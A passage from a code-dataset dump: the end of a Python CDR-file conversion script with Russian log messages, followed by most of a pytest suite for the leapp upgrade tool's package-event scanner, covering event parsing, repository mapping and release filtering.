open(path.join(self._cdr_converted_dir, converted_cdr_name), 'w+')\n converted_cdr_file.writelines(converted_cdr_lines)\n cmd_output.write('INFO: Файл %s из %s (%s) успешно сконвертирован\\n' %\n (cdr_count, len(listdir(self._cdr_upload_dir)), cdr))\n cdr_count += 1\n cmd_output.write('COMPLETE: Все CDR файлы успешно сконвертированы.\\n')\n return 0\n else:\n cmd_output.write('ERROR: Не обнаружен каталог с CDR файлами, которые необходимо обработать\\n')\n return 1\n\n\n def run_generate(self):\n # Start parse converted CDR files via utm5_send_cdr\n count = 1\n if self._convert() == 0:\n for cdr in listdir(self._cdr_converted_dir):\n try:\n subprocess.check_output(['ping','www.google.ru'], shell=True)\n except subprocess.CalledProcessError as exc:\n cmd_output.write('ERROR: Произошла ошибка парсинга. Опреация прервана.\\n')\n return\n cmd_output.write('INFO: Файл %s успешно пропарсился\\n' % (str(count)))\n count += 1\n cmd_output.write('COMPLETE: Все CDR файлы успешно пропарсились.\\n')\n\n","sub_path":"cdr.py","file_name":"cdr.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"628778344","text":"import functools\nimport os.path\nfrom collections import namedtuple\n\nimport pytest\n\nfrom leapp import reporting\nfrom leapp.exceptions import StopActorExecution, StopActorExecutionError\nfrom leapp.libraries.actor import peseventsscanner\nfrom leapp.libraries.actor.peseventsscanner import (\n Action,\n add_output_pkgs_to_transaction_conf,\n drop_conflicting_release_events,\n Event,\n filter_events_by_architecture,\n filter_events_by_releases,\n filter_irrelevant_releases,\n filter_out_pkgs_in_blacklisted_repos,\n get_events,\n map_repositories,\n Package,\n parse_action,\n parse_entry,\n parse_packageset,\n parse_pes_events,\n process_events,\n report_skipped_packages,\n SKIPPED_PKGS_MSG,\n Task\n)\nfrom leapp.libraries.common import fetch\nfrom leapp.libraries.common.testutils import create_report_mocked, CurrentActorMocked, produce_mocked\nfrom leapp.libraries.stdlib import api\nfrom leapp.models import PESIDRepositoryEntry, RepoMapEntry, RepositoriesMapping, RpmTransactionTasks\n\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass show_message_mocked(object):\n def __init__(self):\n self.called = 0\n self.msg = None\n\n def __call__(self, msg):\n self.called += 1\n self.msg = msg\n\n\nclass get_repos_blacklisted_mocked(object):\n def __init__(self, blacklisted):\n self.blacklisted = blacklisted\n\n def __call__(self):\n return self.blacklisted\n\n\ndef test_parse_action(current_actor_context):\n for i in range(8):\n assert parse_action(i) == Action(i)\n\n with pytest.raises(ValueError):\n parse_action(-1)\n parse_action(8)\n\n\ndef test_parse_packageset(current_actor_context):\n pkgset = {'package': [{'name': 'pkg1', 'repository': 'Repo'}]}\n\n parsed = parse_packageset(pkgset)\n assert len(parsed) == 1\n assert Package('pkg1', 'Repo', (None,)) in parsed\n\n assert parse_packageset({}) == set()\n assert parse_packageset({'set_id': 0}) == set()\n\n\ndef test_parse_packageset_modular(current_actor_context):\n pkgset = {'package': [{'name': 'pkg1', 'repository': 'Repo', 'modulestreams': [None]},\n {'name': 'pkg2', 'repository': 'Repo', 'modulestreams': [{\n 'name': 'hey', 'stream': 'lol'\n }]}]}\n\n parsed = parse_packageset(pkgset)\n assert len(parsed) == 2\n assert Package('pkg1', 'Repo', (None,)) in parsed\n assert Package('pkg2', 'Repo', (('hey', 'lol'),)) in parsed\n\n assert parse_packageset({}) == set()\n assert parse_packageset({'set_id': 0}) == set()\n\n\ndef test_parse_entry(current_actor_context):\n \"\"\"\n Tests whether the PES event is correctly parsed from the supplied dictionary with the same\n structure as are the data stored inside the json.\n \"\"\"\n entry = {\n 'action': 4,\n 'in_packageset': {\n 'package': [{'name': 'original', 'repository': 'repo'}]},\n 'out_packageset': {\n 'package': [\n {'name': 'split01', 'repository': 'repo'},\n {'name': 'split02', 'repository': 'repo'}]}}\n\n events = parse_entry(entry)\n assert len(events) == 1\n event = events.pop()\n assert event.action == Action.SPLIT\n assert event.in_pkgs == {Package('original', 'repo', None)}\n assert event.out_pkgs == {Package('split01', 'repo', None), Package('split02', 'repo', None)}\n\n entry = {\n 'action': 1,\n 'in_packageset': {\n 'package': [{'name': 'removed', 'repository': 'repo'}]}}\n\n events = parse_entry(entry)\n assert len(events) == 1\n event = events.pop()\n assert event.action == Action.REMOVED\n assert event.in_pkgs == {Package('removed', 'repo', None)}\n assert event.out_pkgs == set()\n\n\ndef test_parse_pes_events(current_actor_context):\n \"\"\"\n Tests whether all events are correctly parsed from the provided string with the JSON data.\n \"\"\"\n with open(os.path.join(CUR_DIR, 'files/sample01.json')) as f:\n events = parse_pes_events(f.read())\n assert len(events) == 2\n assert events[0].action == Action.SPLIT\n assert events[0].in_pkgs == {Package('original', 'repo', None)}\n assert events[0].out_pkgs == {Package('split01', 'repo', None), Package('split02', 'repo', None)}\n assert events[1].action == Action.REMOVED\n assert events[1].in_pkgs == {Package('removed', 'repo', None)}\n assert events[1].out_pkgs == set()\n\n\ndef test_parse_pes_events_with_modulestreams(current_actor_context):\n \"\"\"\n Tests whether all events are correctly parsed from the provided string with the JSON data.\n \"\"\"\n with open(os.path.join(CUR_DIR, 'files/sample04.json')) as f:\n events = parse_pes_events(f.read())\n assert len(events) == 5\n Expected = namedtuple('Expected', 'action,in_pkgs,out_pkgs')\n expected = [\n Expected(action=Action.SPLIT, in_pkgs={Package('original', 'repo', ('module', 'stream_in'))}, out_pkgs={\n Package('split01', 'repo', None), Package('split02', 'repo', None)}),\n Expected(action=Action.SPLIT, in_pkgs={Package('original', 'repo', None)},\n out_pkgs={Package('split01', 'repo', ('module', 'stream_out')),\n Package('split02', 'repo', ('module', 'stream_out'))}),\n Expected(action=Action.REMOVED, in_pkgs={Package('removed', 'repo', None)}, out_pkgs=set()),\n Expected(action=Action.RENAMED, in_pkgs={Package('modularized', 'repo', ('module', 'stream_in'))}, out_pkgs={\n Package('demodularized', 'repo', None)}),\n Expected(action=Action.RENAMED, in_pkgs={Package('modularized', 'repo', None)}, out_pkgs={\n Package('demodularized', 'repo', None)}),\n ]\n\n for event in events:\n for idx, expectation in enumerate(list(expected)):\n if expectation.action == event.action and expectation.in_pkgs == event.in_pkgs:\n assert event.out_pkgs == expectation.out_pkgs\n expected.pop(idx)\n break\n if not expected:\n break\n assert not expected\n\n\n@ pytest.mark.parametrize('is_verbose_mode_on', [False, True])\ndef test_report_skipped_packages_no_verbose_mode(monkeypatch, caplog, is_verbose_mode_on):\n \"\"\"\n Tests whether the report_skipped_packages function creates message of the expected form\n and that the function respects whether leapp is running in verbose mode.\n \"\"\"\n monkeypatch.setattr(api, 'produce', produce_mocked())\n monkeypatch.setattr(api, 'show_message', show_message_mocked())\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n monkeypatch.setenv('LEAPP_VERBOSE', '1')\n report_skipped_packages(\n title='Packages will not be installed',\n message='packages will not be installed:',\n package_repo_pairs=[(('skipped01', None), 'bad_repo01'), (('skipped02', ('module', 'stream')), 'bad_repo02')]\n )\n\n message = (\n '2 packages will not be installed:\\n'\n '- skipped01 (repoid: bad_repo01)\\n'\n '- skipped02 [module:stream] (repoid: bad_repo02)'\n )\n assert message in caplog.messages\n assert reporting.create_report.called == 1\n assert reporting.create_report.report_fields['title'] == 'Packages will not be installed'\n assert reporting.create_report.report_fields['summary'] == message\n\n leapp_verbose = '1' if is_verbose_mode_on else '0'\n\n monkeypatch.setenv('LEAPP_VERBOSE', leapp_verbose)\n # Reset reporting.create_report for next test part\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n report_skipped_packages(\n title='Packages will not be installed',\n message='packages will not be installed:',\n package_repo_pairs=[(('skipped01', None), 'bad_repo01'), (('skipped02', ('module', 'stream')), 'bad_repo02')]\n )\n\n # FIXME(pstodulk): this is obviously wrong. repoid is currently pesid.. so test\n # is incorrect, and code is incorrect. even the message is missleading.\n # this is going to be fixed in close future.\n message = (\n '2 packages will not be installed:\\n'\n '- skipped01 (repoid: bad_repo01)\\n'\n '- skipped02 [module:stream] (repoid: bad_repo02)'\n )\n\n # Verbose level should only control whether show_message is called, report entry should be created\n # in both cases.\n if is_verbose_mode_on:\n assert message in caplog.messages\n else:\n assert api.show_message.called == 0\n\n assert reporting.create_report.called == 1\n assert reporting.create_report.report_fields['title'] == 'Packages will not be installed'\n assert reporting.create_report.report_fields['summary'] == message\n\n\ndef test_filter_out_pkgs_in_blacklisted_repos(monkeypatch, caplog):\n \"\"\"\n Verifies that packages from blacklisted repos are filtered out.\n\n Verifies that the dictionary mapping packages to the target repoids gets correctly cleansed of all entries\n containing a blacklisted target repository when using filter_out_pkgs_in_blacklisted_repos. Also verifies\n that the user gets informed about packages not being installed due to a blacklisted repository.\n \"\"\"\n monkeypatch.setattr(api, 'show_message', show_message_mocked())\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted',\n get_repos_blacklisted_mocked(set(['blacklisted'])))\n monkeypatch.setenv('LEAPP_VERBOSE', '1')\n\n to_install = {\n ('pkg01', None): 'repo01',\n ('pkg02', ('module', 'stream')): 'repo02',\n ('skipped01', None): 'blacklisted',\n ('skipped02', ('module', 'stream')): 'blacklisted',\n }\n\n pkgs_with_blacklisted_repo = sorted((pkg, repo) for pkg, repo in to_install.items() if repo == 'blacklisted')\n\n msg = '2 {}\\n{}'.format(\n SKIPPED_PKGS_MSG,\n '\\n'.join(\n [\n '- {pkg}{ms} (repoid: {repo})'.format(pkg=pkg[0], repo=repo,\n ms=(' [{}:{}]'.format(*pkg[1]) if pkg[1] else ''))\n for pkg, repo in pkgs_with_blacklisted_repo\n ]\n )\n )\n\n filter_out_pkgs_in_blacklisted_repos(to_install)\n\n assert msg in caplog.messages\n assert reporting.create_report.called == 1\n assert reporting.create_report.report_fields['summary'] == msg\n assert reporting.create_report.report_fields['title'] == (\n 'Packages available in excluded repositories will not be installed'\n )\n\n assert to_install == {('pkg01', None): 'repo01', ('pkg02', ('module', 'stream')): 'repo02'}\n\n\ndef test_resolve_conflicting_requests(monkeypatch):\n \"\"\"\n Verifies that the algorithm correctly resolves conflicting pes events.\n \"\"\"\n monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n events = [\n Event(1, Action.SPLIT,\n {Package('sip-devel', 'repo', None)},\n {Package('python3-sip-devel', 'repo', None), Package('sip', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(2, Action.SPLIT,\n {Package('sip', 'repo', None)},\n {Package('python3-pyqt5-sip', 'repo', None), Package('python3-sip', 'repo', None)},\n (7, 6), (8, 0), [])]\n installed_pkgs = {('sip', None), ('sip-devel', None)}\n\n tasks = process_events([(8, 0)], events, installed_pkgs)\n\n assert tasks[Task.INSTALL] == {('python3-sip-devel', None): 'repo',\n ('python3-pyqt5-sip', None): 'repo',\n ('python3-sip', None): 'repo'}\n assert tasks[Task.REMOVE] == {('sip-devel', None): 'repo'}\n assert tasks[Task.KEEP] == {('sip', None): 'repo'}\n\n\n@ pytest.mark.parametrize(('source_repoid', 'expected_target_repoid'),\n [('rhel7-base-repoid', 'rhel8-crb-repoid'),\n ('rhel7-base-repoid-eus', 'rhel8-crb-repoid-eus')])\ndef test_request_pesid_repo_not_mapped_by_default(monkeypatch, source_repoid, expected_target_repoid):\n \"\"\"\n Tests whether a target repository that is not mapped by default (e.g. CRB)\n is requested to be enabled on the target system if it results from the relevant events.\n\n Note: Since the resulting target repository is not mapped by default from the enabled repositories,\n the data handler should fail to get expected repoids for the given pesid as it works with enabled\n repositories. Therefor, this test tests whether the fallback lookup with representative repository works.\n \"\"\"\n\n repositories_mapping = RepositoriesMapping(\n mapping=[\n RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),\n RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),\n ],\n repositories=[\n PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid',\n arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid-eus',\n arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n PESIDRepositoryEntry(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid',\n arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid',\n arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',\n arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid',\n arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid',\n arch='x86_64', repo_type='rpm', channel='ga', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-eus',\n arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n ])\n\n monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {source_repoid})\n monkeypatch.setattr(api,\n 'current_actor',\n CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))\n\n event = Event(1, Action.MOVED, {Package('test-pkg', 'rhel7-base', None)}, {Package('test-pkg', 'rhel8-CRB', None)},\n (7, 9), (8, 0), [])\n installed_pkgs = {('test-pkg', None)}\n\n tasks = process_events([(8, 0)], [event], installed_pkgs)\n\n assert tasks[Task.KEEP] == {('test-pkg', None): expected_target_repoid}\n\n\ndef test_get_repositories_mapping(monkeypatch):\n \"\"\"\n Tests whether the actor is able to correctly determine the dictionary that maps the target PES ids\n determined from the event processing to the actual target repository ids.\n (tests for the _get_repositories_mapping).\n \"\"\"\n\n make_pesid_repo = functools.partial(PESIDRepositoryEntry, arch='x86_64', repo_type='rpm', channel='ga', rhui='')\n repositories_mapping = RepositoriesMapping(\n mapping=[\n RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),\n RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),\n ],\n repositories=[\n make_pesid_repo(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid'),\n make_pesid_repo(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid'),\n make_pesid_repo(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid'),\n make_pesid_repo(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid'),\n make_pesid_repo(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid'),\n # Extra repositories to make sure the created map contains the correct repoids\n PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-azure',\n arch='x86_64', repo_type='rpm', channel='ga', rhui='azure'),\n PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',\n arch='x86_64', repo_type='rpm', channel='eus', rhui=''),\n PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-s390x',\n arch='s390x', repo_type='rpm', channel='ga', rhui=''),\n ])\n\n monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {'rhel7-base-repoid'})\n monkeypatch.setattr(api,\n 'current_actor',\n CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))\n\n target_pesids = {'rhel8-BaseOS', 'rhel8-AppStream', 'rhel8-CRB'}\n expected_pesid_to_target_repoids = {\n 'rhel8-BaseOS': 'rhel8-baseos-repoid',\n 'rhel8-AppStream': 'rhel8-appstream-repoid',\n 'rhel8-CRB': 'rhel8-crb-repoid'\n }\n\n actual_pesid_to_target_repoids = peseventsscanner._get_repositories_mapping(target_pesids)\n\n fail_description = 'Actor failed to determine what repoid to enable for given target pesids.'\n assert actual_pesid_to_target_repoids == expected_pesid_to_target_repoids, fail_description\n\n\ndef test_pesid_to_target_repoids_translation(monkeypatch, caplog):\n \"\"\"\n Tests whether the actor is able to correctly translate target pesids resulting\n from event processing when it is supplied with a valid dictionary that maps pesids to target repoids.\n \"\"\"\n monkeypatch.setattr(api, 'show_message', show_message_mocked())\n monkeypatch.setattr(peseventsscanner, '_get_repositories_mapping', lambda dummy_target_pesids: {'repo': 'mapped'})\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n monkeypatch.setenv('LEAPP_VERBOSE', '1')\n\n to_install = {\n ('pkg01', None): 'repo',\n ('pkg02', ('module', 'stream')): 'repo',\n ('skipped01', None): 'not_mapped',\n ('skipped02', ('module', 'stream')): 'not_mapped'}\n map_repositories(to_install)\n\n msg = (\n '2 packages may not be installed or upgraded due to repositories unknown to leapp:\\n'\n '- skipped01 (repoid: not_mapped)\\n'\n '- skipped02 [module:stream] (repoid: not_mapped)'\n )\n assert msg in caplog.messages\n assert reporting.create_report.called == 1\n assert reporting.create_report.report_fields['title'] == (\n 'Packages from unknown repositories may not be installed'\n )\n assert reporting.create_report.report_fields['summary'] == msg\n\n assert to_install == {('pkg01', None): 'mapped', ('pkg02', ('module', 'stream')): 'mapped'}\n\n\ndef test_process_events(monkeypatch):\n \"\"\"\n Verifies that the event processing algorithm works as expected.\n \"\"\"\n monkeypatch.setattr(peseventsscanner,\n '_get_repositories_mapping',\n lambda dummy_target_pesids: {'rhel8-repo': 'rhel8-mapped'})\n monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted', get_repos_blacklisted_mocked(set()))\n\n events = [\n Event(1, Action.SPLIT,\n {Package('original', 'rhel7-repo', None)},\n {Package('split01', 'rhel8-repo', None), Package('split02', 'rhel8-repo', None)},\n (7, 6), (8, 0), []),\n Event(2, Action.REMOVED,\n {Package('removed', 'rhel7-repo', None)}, set(),\n (7, 6), (8, 0), []),\n Event(3, Action.PRESENT,\n {Package('present', 'rhel8-repo', None)}, set(),\n (7, 6), (8, 0), []),\n # this package is present at the start, gets removed and then reintroduced\n Event(4, Action.REMOVED,\n {Package('reintroduced', 'rhel7-repo', None)}, set(),\n (7, 6), (8, 0), []),\n Event(5, Action.PRESENT,\n {Package('reintroduced', 'rhel8-repo', None)}, set(),\n (8, 0), (8, 1), []),\n # however, this package was never there\n Event(6, Action.REMOVED,\n {Package('neverthere', 'rhel7-repo', None)}, set(),\n (7, 6), (8, 0), []),\n Event(7, Action.PRESENT,\n {Package('neverthere', 'rhel8-repo', None)}, set(),\n (8, 0), (8, 1), [])]\n installed_pkgs = {('original', None), ('removed', None), ('present', None), ('reintroduced', None)}\n tasks = process_events([(8, 0), (8, 1)], events, installed_pkgs)\n\n assert tasks[Task.INSTALL] == {('split02', None): 'rhel8-mapped', ('split01', None): 'rhel8-mapped'}\n assert tasks[Task.REMOVE] == {('removed', None): 'rhel7-repo', ('original', None): 'rhel7-repo'}\n assert tasks[Task.KEEP] == {('present', None): 'rhel8-mapped', ('reintroduced', None): 'rhel8-mapped'}\n\n\ndef test_get_events(monkeypatch):\n \"\"\"\n Verifies that the actor gracefully handles errors raised when unable to load events from a file\n and inhibits the upgrade in such case.\n \"\"\"\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n monkeypatch.setattr(api, 'current_actor', CurrentActorMocked())\n\n with pytest.raises(StopActorExecution):\n get_events(os.path.join(CUR_DIR, 'files'), 'sample02.json')\n assert reporting.create_report.called == 1\n assert 'inhibitor' in reporting.create_report.report_fields['flags']\n\n reporting.create_report.called = 0\n reporting.create_report.model_instances = []\n with pytest.raises(StopActorExecution):\n get_events(os.path.join(CUR_DIR, 'files'), 'sample03.json')\n assert reporting.create_report.called == 1\n assert 'inhibitor' in reporting.create_report.report_fields['flags']\n\n\ndef test_pes_data_not_found(monkeypatch):\n def read_or_fetch_mocked(filename, directory=\"/etc/leapp/files\", service=None, allow_empty=False):\n fetch._raise_error('pes-data.json', 'epic fail!')\n\n monkeypatch.setattr(fetch, 'read_or_fetch', read_or_fetch_mocked)\n monkeypatch.setattr(reporting, 'create_report', create_report_mocked())\n monkeypatch.setattr(api, 'current_actor', CurrentActorMocked())\n with pytest.raises(StopActorExecutionError):\n get_events('/etc/leapp', 'pes-data.json')\n\n\ndef test_add_output_pkgs_to_transaction_conf():\n \"\"\"\n Verifies that the add_output_pkgs_to_transaction_conf correctly modifies to_remove field based\n on the supplied events.\n \"\"\"\n events = [\n Event(1, Action.SPLIT,\n {Package('split_in', 'repo', None)},\n {Package('split_out1', 'repo', None), Package('split_out2', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(2, Action.MERGED,\n {Package('merge_in1', 'repo', None), Package('merge_in2', 'repo', None)},\n {Package('merge_out', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(3, Action.RENAMED,\n {Package('renamed_in', 'repo', None)},\n {Package('renamed_out', 'repo', None)},\n (7, 6), (8, 0), []),\n Event(4, Action.REPLACED,\n {Package('replaced_in', 'repo', None)},\n {Package('replaced_out', 'repo', None)},\n (7, 6), (8, 0), []),\n ]\n\n conf_empty = RpmTransactionTasks()\n add_output_pkgs_to_transaction_conf(conf_empty, events)\n assert conf_empty.to_remove == []\n\n conf_split = RpmTransactionTasks(to_remove=['split_in'])\n add_output_pkgs_to_transaction_conf(conf_split, events)\n assert sorted(conf_split.to_remove) == ['split_in', 'split_out1', 'split_out2']\n\n conf_merged_incomplete = RpmTransactionTasks(to_remove=['merge_in1'])\n add_output_pkgs_to_transaction_conf(conf_merged_incomplete, events)\n assert conf_merged_incomplete.to_remove == ['merge_in1']\n\n conf_merged = RpmTransactionTasks(to_remove=['merge_in1', 'merge_in2'])\n add_output_pkgs_to_transaction_conf(conf_merged, events)\n assert sorted(conf_merged.to_remove) == ['merge_in1', 'merge_in2', 'merge_out']\n\n conf_renamed = RpmTransactionTasks(to_remove=['renamed_in'])\n add_output_pkgs_to_transaction_conf(conf_renamed, events)\n assert sorted(conf_renamed.to_remove) == ['renamed_in', 'renamed_out']\n\n conf_replaced = RpmTransactionTasks(to_remove=['replaced_in'])\n add_output_pkgs_to_transaction_conf(conf_replaced, events)\n assert sorted(conf_replaced.to_remove) == ['replaced_in', 'replaced_out']\n\n\ndef test_filter_events_by_architecture():\n \"\"\"\n Verifies that the packages are correctly filtered based on the architecture.\n \"\"\"\n events = [\n Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 0), ['arch1']),\n Event(2, Action.PRESENT, {Package('pkg2', 'repo', None)}, set(), (7, 6), (8, 0), ['arch2', 'arch1', 'arch3']),\n Event(3, Action.PRESENT, {Package('pkg3', 'repo', None)}, set(), (7, 6), (8, 0), ['arch2', 'arch3', 'arch4']),\n Event(4, Action.PRESENT, {Package('pkg4', 'repo', None)}, set(), (7, 6), (8, 0), [])\n ]\n\n filtered = filter_events_by_architecture(events, 'arch1')\n assert {Package('pkg1', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg2', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg3', 'repo', None)} not in [event.in_pkgs for event in filtered]\n assert {Package('pkg4', 'repo', None)} in [event.in_pkgs for event in filtered]\n\n\ndef test_filter_events_by_releases():\n \"\"\"\n Tests whether the events are correctly filtered based on the relevant supplied releases.\n \"\"\"\n events = [\n Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (7, 7), []),\n Event(2, Action.PRESENT, {Package('pkg2', 'repo', None)}, set(), (7, 7), (7, 8), []),\n Event(3, Action.PRESENT, {Package('pkg3', 'repo', None)}, set(), (7, 8), (8, 0), []),\n Event(4, Action.PRESENT, {Package('pkg4', 'repo', None)}, set(), (8, 0), (8, 1), []),\n Event(5, Action.PRESENT, {Package('pkg5', 'repo', None)}, set(), (8, 1), (8, 2), [])\n ]\n\n filtered = filter_events_by_releases(events, [(7, 6), (7, 7), (8, 0), (8, 3)])\n assert {Package('pkg1', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg2', 'repo', None)} not in [event.in_pkgs for event in filtered]\n assert {Package('pkg3', 'repo', None)} in [event.in_pkgs for event in filtered]\n assert {Package('pkg4', 'repo', None)} not in [event.in_pkgs for event in filtered]\n assert {Package('pkg5', 'repo', None)} not in [event.in_pkgs for event in filtered]\n\n\n@pytest.mark.parametrize(('src_version', 'dst_version', 'expected_releases'),\n [('7.9', '8.6', [(8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6)]),\n ('8.6', '9.0', [(9, 0)])])\ndef test_filter_irrelevant_releases(monkeypatch, src_version, dst_version, expected_releases):\n \"\"\"\n Tests that all releases that happened before source version or after the target version are filtered out.\n \"\"\"\n\n monkeypatch.setattr(api, 'current_actor', CurrentActorMocked(src_ver=src_version, dst_ver=dst_version))\n releases = [\n (7, 6), (7, 7), (7, 8), (7, 9), (8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6), (9, 0), (9, 1)\n ]\n filtered_releases = filter_irrelevant_releases(releases)\n assert filtered_releases == expected_releases\n\n\ndef test_drop_conflicting_release_events():\n \"\"\"\n Tests whether correct events are dropped from conflicting release events.\n From conflicting events only the one with highest target release should be kept.\n \"\"\"\n\n conflict1a = Event(1, Action.PRESENT, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 0), [])\n conflict1b = Event(2, Action.REPLACED, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 2), [])\n conflict1c = Event(3, Action.REMOVED, {Package('pkg1', 'repo', None)}, set(), (7, 6), (8, 1), [])\n conflict2a = Event(4, Action.REMOVED, {Package('pkg2a', 'repo', None)}, set(), (7, 6), (8, 0), [])\n conflict2b = Event(5, Action.REPLACED,\n {Package('pkg2a', 'repo', None)}, {Package('pkg2b', 'repo', None)},\n (7, 6), (8, 1), [])\n # two input packages\n conflict3a = Event(6, Action.MERGED,\n {Package('pkg3a', 'repo', None), Package('pkg3b', 'repo', None)},\n {Package('pkg3c', 'repo', None)},\n (7, 6), (8, 0), [])\n conflict3b = Event(7, Action.MERGED,\n {Package('pkg3a', 'repo', None), Package('pkg3b', 'repo', None)},\n {Package('pkg3d', 'repo', None)},\n (7, 6), (8, 1), [])\n # these two can't be chained, don't remove anything\n okay1a = Event(8, Action.REPLACED,\n {Package('pkg4a', 'repo', None)}, {Package('pkg4b', 'repo', None)},\n (7, 6), (8, 0), [])\n okay1b = Event(9, Action.REPLACED,\n {Package('pkg4b', 'repo', None)}, {Package('pkg4c', 'repo', None)},\n (8, 0), (8, 1), [])\n\n events = [conflict1a, conflict1b, conflict1c, conflict2a, conflict2b, conflict3a, conflict3b, okay1a, okay1b]\n drop_conflicting_release_events(events)\n\n for event in [conflict1b, conflict2b, conflict3b, okay1a, okay1b]:\n assert event in events\n for event in [conflict1a, conflict1c, conflict2a, conflict3a]:\n assert event not in events\n\n\ndef test_process_modular_events(monkeypatch):\n monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n events = [\n # match the right modular package without touching the ones with absent or different module/stream\n # in practice, installed packages can't have the same name, just testing that it matches the right one\n Event(1, Action.REMOVED, {Package('removed', 'repo', ('module', '42'))}, set(), (8, 4), (9, 0), []),\n Event(2, Action.SPLIT,\n {Package('split_in', 'repo', ('splitin', 'foo'))},\n {Package('split_out1', 'repo', None), Package('split_out2', 'repo', ('splitout', 'foo'))},\n (8, 4), (9, 0), []),\n Event(3, Action.SPLIT,\n {Package('split_in', 'repo', ('splitin', 'bar'))},\n {Package('split_out3', 'repo', None), Package('split_out2', 'repo', ('splitout', 'bar'))},\n (8, 4), (9, 0), []),\n ]\n installed_pkgs = {('removed', ('module', '42')),\n ('removed', ('model', '42')),\n ('removed', ('module', '420')),\n ('removed', None),\n ('split_in', ('splitin', 'foo'))}\n\n tasks = process_events([(9, 0)], events, installed_pkgs)\n\n assert ('removed', ('module', '42')) in tasks[Task.REMOVE] # name, module and stream match\n assert ('removed', ('model', '42')) not in tasks[Task.REMOVE] # different module\n assert ('removed', ('module', '420')) not in tasks[Task.REMOVE] # different stream\n assert ('removed', None) not in tasks[Task.REMOVE] # no module stream\n\n assert ('split_in', ('splitin', 'foo')) in tasks[Task.REMOVE]\n assert ('split_out1', None) in tasks[Task.INSTALL]\n assert ('split_out2', ('splitout', 'foo')) in tasks[Task.INSTALL]\n assert ('split_in', ('splitin', 'bar')) not in tasks[Task.REMOVE]\n assert ('split_out3', None) not in tasks[Task.INSTALL]\n assert ('split_out2', ('splitout', 'bar')) not in tasks[Task.INSTALL]\n\n\n@ pytest.mark.parametrize(('installed_pkgs', 'expected_relevance'),\n [({('pkg1', None), ('pkg2', None)}, True),\n ({('pkg2', None)}, True),\n ({('pkg0', None)}, True),\n ({('pkg1', 'wuzza:11')}, True),\n ({('pkg2', 'wuzza:11')}, True),\n ({('pkg1', 'wuzza:11'), ('pkg2', 'wuzza:11')}, True),\n ({('pkg0', 'wuzza:11')}, False),\n (set(), False)])\ndef test_merge_events_relevance_assessment(monkeypatch, installed_pkgs, expected_relevance):\n \"\"\"\n Verifies that the relevance of the MERGED events is correctly assessed when processing events.\n \"\"\"\n monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)\n monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)\n\n events = [\n Event(\n 1, Action.REPLACED,\n 